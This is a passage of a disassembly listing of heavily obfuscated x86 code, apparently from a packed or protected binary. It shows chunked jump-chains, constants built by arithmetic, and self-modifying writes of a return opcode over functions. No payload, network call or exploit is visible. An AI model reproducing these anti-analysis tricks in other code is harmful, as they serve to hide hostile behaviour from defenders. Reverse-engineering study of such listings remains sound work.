; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_4495B4: ; CODE XREF: sub_43DCFF+658Ej
; sub_43AB62:loc_45433Bj
and eax, 0B5AD878Fh
test eax, 1000h
jmp loc_43F1C1
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_4495C5: ; CODE XREF: sub_446258:loc_440F1Ej
jz loc_44DE5F
jmp loc_43B91E
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_4495D0: ; CODE XREF: ut7h7i2x:0044FF26j
; ut7h7i2x:0044FF35j
rol eax, 2
and eax, 0A840C1C8h
add eax, 8AEE4E1Ch
call sub_43AA94
mov ds:dword_41D0C0, eax
jmp loc_43A3C6
; ---------------------------------------------------------------------------
loc_4495EF: ; CODE XREF: ut7h7i2x:loc_4556B6j
not ecx
or ebp, 0BA3529BAh
jmp loc_456FE8
; ---------------------------------------------------------------------------
loc_4495FC: ; DATA XREF: sub_4596E5:loc_443789o
push 0D52AD81Eh
and edi, 3B2ADBE2h
jmp loc_447854
; ---------------------------------------------------------------------------
loc_44960C: ; CODE XREF: ut7h7i2x:0044C2A3j
jnp loc_4450D1
add ecx, esi
xchg eax, edi
sub eax, 62C51FEBh
and eax, 1F1C4911h
jmp loc_453F11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440F8E
loc_449627: ; CODE XREF: sub_440F8E+8251j
jz loc_44C26E
jmp loc_4537BC
; END OF FUNCTION CHUNK FOR sub_440F8E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_352. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_449633: ; CODE XREF: sub_4565B2-7678j
jmp loc_450C49
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_449638: ; CODE XREF: sub_445188+Ej
jmp loc_45A8A1
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
loc_44963D: ; CODE XREF: ut7h7i2x:004439BEj
jmp nullsub_511
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2AA
loc_449642: ; CODE XREF: sub_44E2AA+Cj
jnz loc_447E52
call sub_451F89
loc_44964D: ; CODE XREF: ut7h7i2x:0044F3B6j
jmp loc_43952E
; END OF FUNCTION CHUNK FOR sub_44E2AA
; ---------------------------------------------------------------------------
loc_449652: ; CODE XREF: ut7h7i2x:00456AA9j
rol ebx, 8
; =============== S U B R O U T I N E =======================================
sub_449655 proc near ; CODE XREF: ut7h7i2x:0044EC3Ap
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg ecx, [esp-4+arg_0]
jmp sub_44E2C4
sub_449655 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_449661: ; CODE XREF: sub_43DBEC:loc_444B0Aj
; ut7h7i2x:loc_4478E1j
jnz loc_45A784
jnz loc_45545C
sub edi, esi
jmp loc_45A784
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_449674: ; CODE XREF: sub_44445F+AECCj
test ecx, edx
jmp loc_44A04C
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
loc_44967B: ; CODE XREF: ut7h7i2x:0043B6B6j
jnb loc_454AF8
and ecx, 776CAC7Bh
jmp loc_43C424
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44968C: ; CODE XREF: sub_43D021:loc_4453E0j
test ecx, eax
jmp loc_442BA5
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_449693: ; CODE XREF: sub_449D3B-552Fj
pushf
loc_449694: ; CODE XREF: sub_449D3B:loc_43DDE4j
push offset loc_44F388
jmp loc_450FFE
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_44969E: ; CODE XREF: sub_45A25C:loc_44EA42j
pop ecx
mov edx, [esp+4+var_4]
; END OF FUNCTION CHUNK FOR sub_45A25C
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4496A2: ; CODE XREF: sub_43AB62+1D7A1j
push offset loc_43CF1F
jmp nullsub_377
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_4496AC: ; CODE XREF: ut7h7i2x:loc_44FFD9j
retn
; ---------------------------------------------------------------------------
loc_4496AD: ; CODE XREF: ut7h7i2x:00450A01j
jmp loc_454E5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B43D
loc_4496B2: ; CODE XREF: sub_44B43D-DB80j
jmp loc_455922
; END OF FUNCTION CHUNK FOR sub_44B43D
; ---------------------------------------------------------------------------
loc_4496B7: ; CODE XREF: ut7h7i2x:0043CEDDj
jmp loc_43EB6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4496BC: ; CODE XREF: sub_457A66:loc_45744Ej
pop edi
mov eax, [ebp+var_4]
mov al, [eax]
jb loc_43CBE2
sub al, 99h
jmp loc_4589EF
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4496CF: ; CODE XREF: sub_447EB5+9F75j
xor eax, 9F948A15h
add eax, 0DEE82CF3h
add eax, ebp
call sub_4447C9
loc_4496E2: ; CODE XREF: sub_441A79+10746j
jmp nullsub_137
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_4496E7: ; CODE XREF: sub_44CE09+Dj
jmp loc_455C04
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_4496EC: ; CODE XREF: sub_44C791:loc_44486Bj
jnz loc_4559A8
jmp loc_43B6BC
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
xchg ebx, [eax]
xor edi, ecx
jmp sub_44CBC2
; =============== S U B R O U T I N E =======================================
sub_449700 proc near ; CODE XREF: sub_4448AF-AC8Bp
; sub_456397+4p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004397BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439A5E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CB35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E776 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F8CD SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004402EB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440D2C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00441566 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441A8D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004422F0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443A83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B4A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004474FB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447A0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448EBD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044ACFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B41A SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044D017 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E812 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452645 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457378 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045A10F SIZE 00000005 BYTES
push esi
push 521D9149h
pop esi
sub esi, 4BCBF9B0h
rol esi, 1Eh
jnb loc_443B4A
loc_449716: ; CODE XREF: sub_44DC72+Dj
jmp loc_4474FB
sub_449700 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_44971B: ; CODE XREF: sub_44101A+B06Fj
jmp loc_442B7A
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_449720: ; CODE XREF: sub_4463D6+2690j
jmp loc_448F1B
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
or eax, ebx
jmp loc_453336
; ---------------------------------------------------------------------------
loc_44972C: ; CODE XREF: ut7h7i2x:004509D9j
push edx
not edi
; START OF FUNCTION CHUNK FOR sub_44261F
loc_44972F: ; CODE XREF: sub_44261F+E3ADj
add eax, 0A455D4A4h
add eax, ebp
add eax, 807CB28Ah
mov eax, [eax]
jmp loc_450B95
; END OF FUNCTION CHUNK FOR sub_44261F
; =============== S U B R O U T I N E =======================================
sub_449744 proc near ; CODE XREF: ut7h7i2x:00445A5Fp
; ut7h7i2x:loc_45225Fj
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CADF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BBFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D2A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00454F2B SIZE 0000001A BYTES
xchg eax, [esp+0]
loc_449747: ; CODE XREF: ut7h7i2x:loc_448B2Bj
pop eax
push ecx
push edi
mov edi, ecx
jmp loc_454F2B
sub_449744 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_449751: ; CODE XREF: ut7h7i2x:004534A4j
sub eax, ebp
mov ebp, 0F2C4D531h
jmp loc_44323A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_44975D: ; CODE XREF: sub_45A8C1:loc_44C590j
jge loc_445C7F
mov edi, [ecx]
and edi, 0D3461253h
jmp loc_445C72
; END OF FUNCTION CHUNK FOR sub_45A8C1
; ---------------------------------------------------------------------------
loc_449770: ; CODE XREF: ut7h7i2x:0043D548j
js loc_448A5C
or ecx, 0E5EE2192h
loc_44977C: ; CODE XREF: ut7h7i2x:loc_43D534j
xor esi, 0D8C7F242h
test esi, 2000000h
jmp loc_43D832
; =============== S U B R O U T I N E =======================================
sub_44978D proc near ; CODE XREF: sub_4499F4p
; sub_456640+16j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044B53F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454DCA SIZE 00000005 BYTES
jno loc_44B53F
push offset loc_439FEC
jmp loc_454DCA
sub_44978D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and ecx, esi
jmp sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4562F0
loc_4497A4: ; CODE XREF: sub_4562F0:loc_456300j
mov byte ptr [eax], 0C3h
jmp loc_443EFA
; END OF FUNCTION CHUNK FOR sub_4562F0
; =============== S U B R O U T I N E =======================================
sub_4497AC proc near ; CODE XREF: sub_41A456+2Ep
; sub_4497AC+5j
; DATA XREF: ...
call sub_4497C1
jmp ds:off_41D03C
sub_4497AC endp
; ---------------------------------------------------------------------------
loc_4497B7: ; CODE XREF: ut7h7i2x:0044325Bj
jmp loc_44AEC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F19A
loc_4497BC: ; CODE XREF: sub_43F19A-5D6Ej
jmp loc_43ACCC
; END OF FUNCTION CHUNK FOR sub_43F19A
; =============== S U B R O U T I N E =======================================
sub_4497C1 proc near ; CODE XREF: sub_450365:loc_447A72j
; sub_4497ACp ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004397BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E648 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00443260 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004437D1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004470D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447629 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447696 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004478D0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FDE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450378 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045275A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045570A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A831 SIZE 00000005 BYTES
jnz loc_450378
pop edx
jmp loc_4470D6
sub_4497C1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4497CD: ; CODE XREF: ut7h7i2x:loc_44ED83j
and edx, 43E2F65Ah
add edx, 0FE23029Ah
mov edx, [edx]
or edx, edx
jnz loc_4527A6
jmp loc_44A8F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453EBA
loc_4497E8: ; CODE XREF: sub_453EBA+16j
rol edx, 0Ch
xor edx, 0D1F2C087h
add edx, 76EB05F9h
mov [edx], eax
pop edx
lea eax, sub_45108E
mov byte ptr [eax], 0C3h
jmp loc_43F360
; END OF FUNCTION CHUNK FOR sub_453EBA
; =============== S U B R O U T I N E =======================================
sub_449808 proc near ; CODE XREF: sub_41A456+1Ep
; ut7h7i2x:00447EC0j
; DATA XREF: ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A75B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043FB53 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00440E2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442C3E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443F61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447EC6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004585A7 SIZE 0000000F BYTES
push esi
jmp loc_43FB53
sub_449808 endp
; ---------------------------------------------------------------------------
loc_44980E: ; CODE XREF: ut7h7i2x:004455B4j
jnz loc_446C4E
loc_449814: ; CODE XREF: ut7h7i2x:loc_44D610j
jmp loc_43CB50
; ---------------------------------------------------------------------------
loc_449819: ; CODE XREF: ut7h7i2x:004430B8j
jnp loc_447764
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_44981F: ; CODE XREF: sub_43EDD8:loc_457D0Aj
call sub_442319
; END OF FUNCTION CHUNK FOR sub_43EDD8
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_449824: ; CODE XREF: sub_43C1D2+1213Ej
xor edx, ds:4000F4h
loc_44982A: ; CODE XREF: sub_43FCEE+3407j
or edx, 0C7D6B42Bh
add edx, 8D252AECh
xor edx, 92AFE668h
jmp loc_454C6F
; END OF FUNCTION CHUNK FOR sub_43C1D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45114D
loc_449841: ; CODE XREF: sub_45114D:loc_451FB0j
jz loc_43BAEA
jmp loc_446012
; END OF FUNCTION CHUNK FOR sub_45114D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C87F
loc_44984C: ; CODE XREF: sub_44C87F-10A60j
jz loc_44B36B
mov eax, edi
jmp loc_44B365
; END OF FUNCTION CHUNK FOR sub_44C87F
; ---------------------------------------------------------------------------
loc_449859: ; CODE XREF: ut7h7i2x:00445EF6j
jns loc_44E281
cmp ecx, 103431ACh
jmp loc_45A836
; =============== S U B R O U T I N E =======================================
sub_44986A proc near ; CODE XREF: ut7h7i2x:004403F0j
; sub_453FFB:loc_44A375p
; FUNCTION CHUNK AT 004546A8 SIZE 0000000E BYTES
xchg ebx, [esp+0]
pop ebx
call sub_45499E
mov eax, 86B13FACh
call sub_45854D
mov ds:off_41D1EC, eax
jmp loc_4546A8
sub_44986A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_449888: ; CODE XREF: ut7h7i2x:00440351j
js loc_44A4E5
sbb edi, ebp
jmp loc_44B702
; ---------------------------------------------------------------------------
loc_449895: ; CODE XREF: ut7h7i2x:0043E8FCj
adc ebp, 9996AA85h
xchg ebp, esi
popf
; START OF FUNCTION CHUNK FOR sub_43FD68
loc_44989E: ; CODE XREF: sub_43FD68:loc_43E8EBj
add ebx, 4039C09Dh
add ebx, ebp
; END OF FUNCTION CHUNK FOR sub_43FD68
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4498A6: ; CODE XREF: sub_447EB5:loc_4491B5j
jmp loc_43A075
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456590
loc_4498AB: ; CODE XREF: sub_456590:loc_456595j
rol edi, 16h
add edi, 8F1ED898h
and edi, 0EE8A896Ah
add edi, 93C1C1E6h
jmp loc_4543C9
; END OF FUNCTION CHUNK FOR sub_456590
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_4498C5: ; CODE XREF: sub_44DD56-BC4Fj
pushf
loc_4498C6: ; CODE XREF: sub_44DD56:loc_4420FBj
add edi, 0FD3F92F7h
xchg edi, [esp+0]
push ebx
loc_4498D0: ; CODE XREF: ut7h7i2x:loc_4572DAj
pushf
push 601A534Eh
pop ebx
add ebx, 85C6C31Ch
jmp loc_43DA3A
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_4498E2: ; CODE XREF: sub_448321+61D3j
jg loc_447B99
sbb ebp, 0DD8920A5h
add ebp, 0B889C80Eh
loc_4498F4: ; CODE XREF: sub_448321+5CD1j
add edi, 18109043h
xchg edi, [esp+0]
push offset sub_4464FE
jmp loc_45A7BE
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAA4
loc_449907: ; CODE XREF: sub_44CAA4:loc_44B11Dj
mov eax, offset dword_43E35C
call sub_44A4C0
cmp ds:dword_43E36C, 0
jnz loc_440EBB
jmp loc_440D8E
; END OF FUNCTION CHUNK FOR sub_44CAA4
; ---------------------------------------------------------------------------
locret_449923: ; CODE XREF: ut7h7i2x:loc_44DDDEj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_449924: ; CODE XREF: sub_439B67+170DDj
jmp loc_448C9F
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_449929: ; CODE XREF: sub_4455F4-1146j
jmp sub_44C068
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
loc_44992E: ; CODE XREF: ut7h7i2x:0043E67Bj
jmp loc_439475
; ---------------------------------------------------------------------------
loc_449933: ; CODE XREF: ut7h7i2x:0044F632j
inc dword ptr [ebp-8]
loc_449936: ; CODE XREF: ut7h7i2x:loc_4507F1j
; ut7h7i2x:00457560j
mov eax, [ebp-8]
call sub_44045E
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_44993E: ; CODE XREF: sub_444A4D+5C0Bj
jmp loc_442688
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
cdq
jmp sub_4428C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44682E
loc_449949: ; CODE XREF: sub_44682E+8532j
lea eax, sub_44682E
mov byte ptr [eax], 0C3h
jmp sub_44682E
; END OF FUNCTION CHUNK FOR sub_44682E
; =============== S U B R O U T I N E =======================================
sub_449957 proc near ; CODE XREF: sub_41A06E+53p
; sub_41A06E+8Ep ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004394BC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043D34A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF75 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F4F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D9B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455640 SIZE 00000017 BYTES
push ebx
push 4B83C41Bh
jmp loc_43D34A
sub_449957 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_449962: ; CODE XREF: sub_457A66-9D99j
push offset sub_444DAA
jmp nullsub_306
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44996C proc near ; CODE XREF: sub_446215-59FCj
retn
sub_44996C endp
; ---------------------------------------------------------------------------
loc_44996D: ; CODE XREF: ut7h7i2x:loc_44758Cj
rol ebx, 14h
jb loc_43F2D7
cmp eax, 64C19E49h
jmp loc_44DC07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_404. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C39B
loc_449982: ; CODE XREF: sub_43C39B+Cj
jmp nullsub_68
; END OF FUNCTION CHUNK FOR sub_43C39B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455EC1
loc_449987: ; CODE XREF: sub_455EC1+Dj
jnz loc_456AC2
loc_44998D: ; CODE XREF: ut7h7i2x:0044F3CAj
jmp sub_454A2B
; END OF FUNCTION CHUNK FOR sub_455EC1
; ---------------------------------------------------------------------------
cmp edx, 5F80EC4Eh
jmp loc_457EC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_44999D: ; CODE XREF: sub_43E68B+DDF8j
jge loc_43A7A0
jg loc_43E6A2
jmp loc_451803
; END OF FUNCTION CHUNK FOR sub_43E68B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_4499AE: ; CODE XREF: sub_43E592:loc_43AFCCj
jnz loc_447965
loc_4499B4: ; CODE XREF: sub_449957+BCFBj
jmp loc_43CAAF
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_4499B9: ; CODE XREF: sub_45341C+1j
jmp loc_44B1C5
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4499BE: ; CODE XREF: sub_439BD1+141AEj
jmp loc_441347
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_4499C3: ; CODE XREF: ut7h7i2x:0044B559j
jmp loc_448547
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_4499C8: ; CODE XREF: sub_44092D+64D2j
jmp loc_44BA3B
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
mov ebx, [edx]
and esi, 2C123336h
not edx
jmp loc_44795F
; =============== S U B R O U T I N E =======================================
sub_4499DC proc near ; CODE XREF: ut7h7i2x:0043A5F5j
; ut7h7i2x:0045098Fp
; FUNCTION CHUNK AT 00446DAA SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
loc_4499E0: ; CODE XREF: ut7h7i2x:loc_45263Fj
mov ds:off_41D06C, eax
lea eax, sub_452361
mov byte ptr [eax], 0C3h
jmp loc_446DAA
sub_4499DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4499F4 proc near ; CODE XREF: sub_418D80+31Ep
; sub_4499F4+5j
; DATA XREF: ...
call sub_44978D
jmp ds:off_41D070
sub_4499F4 endp
; ---------------------------------------------------------------------------
loc_4499FF: ; CODE XREF: ut7h7i2x:loc_455F47j
push eax
push edx
push 0F4AF8E26h
pop edx
jmp loc_451B08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453139
loc_449A0C: ; CODE XREF: sub_453139+3j
call nullsub_19
push 0C66BB690h
pop eax
xor eax, 72586B3Eh
add eax, 4C0FE696h
jmp loc_443931
; END OF FUNCTION CHUNK FOR sub_453139
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_449A28: ; CODE XREF: sub_43C1E5:loc_4444BFj
test esi, 20h
jmp loc_4489B4
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DAFF
loc_449A33: ; CODE XREF: sub_43DAFF+52C5j
and ecx, 0C8EF66D6h
add ecx, 0FFDF0671h
xchg ecx, [esp+0]
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_43DAFF
; ---------------------------------------------------------------------------
loc_449A47: ; CODE XREF: ut7h7i2x:00452876j
jnp loc_454EEB
mov esi, 0E5CC3312h
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_449A52: ; CODE XREF: sub_4529E0:loc_45285Dj
rol esi, 19h
add esi, 0CBBA8A02h
mov [esi], eax
jmp loc_43D137
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
loc_449A62: ; CODE XREF: ut7h7i2x:loc_45A2CCj
jnz loc_43957F
jmp loc_44EE19
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451039
loc_449A6E: ; CODE XREF: sub_451039+Dj
mov eax, offset dword_43E3A0
call sub_43F058
lea eax, [ebp-14h]
push eax
loc_449A7C: ; CODE XREF: ut7h7i2x:0043C427j
call sub_43BA59
jmp loc_443FEB
; END OF FUNCTION CHUNK FOR sub_451039
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_449A86: ; CODE XREF: sub_45A79F-EA94j
rol ebp, 1Ch
jmp loc_452E5D
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
loc_449A8E: ; CODE XREF: ut7h7i2x:00452DC2j
sbb edx, esi
ja loc_449EC6
add ebp, 0F7D89225h
sbb eax, 1D6F026h
jmp loc_44135E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454277
loc_449AA7: ; CODE XREF: sub_454277+3F7j
push eax
push 4
call sub_440493
push eax
push ebx
push 0DA751BD8h
pop ebx
jmp loc_4562AD
; END OF FUNCTION CHUNK FOR sub_454277
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_335. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_449ABD: ; CODE XREF: sub_45967C-3FADj
jmp loc_443174
; END OF FUNCTION CHUNK FOR sub_45967C
; =============== S U B R O U T I N E =======================================
sub_449AC2 proc near ; DATA XREF: sub_459B58-188ECo
; FUNCTION CHUNK AT 00440618 SIZE 00000008 BYTES
push 32564565h
pop ecx
and ecx, 0FD8AE86Ch
add ecx, 0D041C391h
jmp loc_440618
sub_449AC2 endp
; =============== S U B R O U T I N E =======================================
sub_449AD9 proc near ; DATA XREF: ut7h7i2x:00457F56o
; FUNCTION CHUNK AT 004401FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004464C4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450330 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045702C SIZE 00000019 BYTES
push edi
push 5BE22EFBh
pop edi
or edi, 3D8B4320h
cmp edi, 0A55647A4h
jmp loc_4464C4
sub_449AD9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_449AF1: ; CODE XREF: sub_44092D+B117j
jo loc_447CA2
loc_449AF7: ; CODE XREF: sub_44092D:loc_446DF9j
call sub_453D8B
mov edx, 0B242B436h
push esi
push 0CD8E17AEh
pop esi
xor esi, 0F6E69BAh
rol esi, 10h
jmp loc_458F55
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
push 0C7532727h
pop eax
add eax, 76239D55h
or eax, 0B54132E2h
rol eax, 15h
sub eax, 0F738D22Dh
add eax, 0DDE5E33Bh
push offset loc_44A808
jmp loc_43EEDF
; ---------------------------------------------------------------------------
ja loc_457249
jmp sub_4584D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_449B4C: ; CODE XREF: sub_43B7F7:loc_444772j
jz loc_43E3B7
jmp loc_43F6CD
; END OF FUNCTION CHUNK FOR sub_43B7F7
; =============== S U B R O U T I N E =======================================
sub_449B57 proc near ; CODE XREF: sub_457453-B076p
; ut7h7i2x:0045A227j
xchg edi, [esp+0]
pop edi
push eax
push esi
push offset sub_44E158
jmp loc_444284
sub_449B57 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_449B67: ; CODE XREF: sub_44937E:loc_44397Cj
mov eax, [eax]
or eax, eax
jnz loc_43AF6A
jmp loc_44D309
; END OF FUNCTION CHUNK FOR sub_44937E
; =============== S U B R O U T I N E =======================================
sub_449B76 proc near ; CODE XREF: ut7h7i2x:00445ACCj
; sub_44C8F3:loc_45A552p
; FUNCTION CHUNK AT 00444E5B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C988 SIZE 00000014 BYTES
xchg esi, [esp+0]
pop esi
push eax
call sub_43CA2D
push edi
push 69383F1Eh
pop edi
rol edi, 1
jmp loc_44C988
sub_449B76 endp
; =============== S U B R O U T I N E =======================================
sub_449B8E proc near ; DATA XREF: sub_442D06+D10Co
; FUNCTION CHUNK AT 004413B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441E53 SIZE 00000005 BYTES
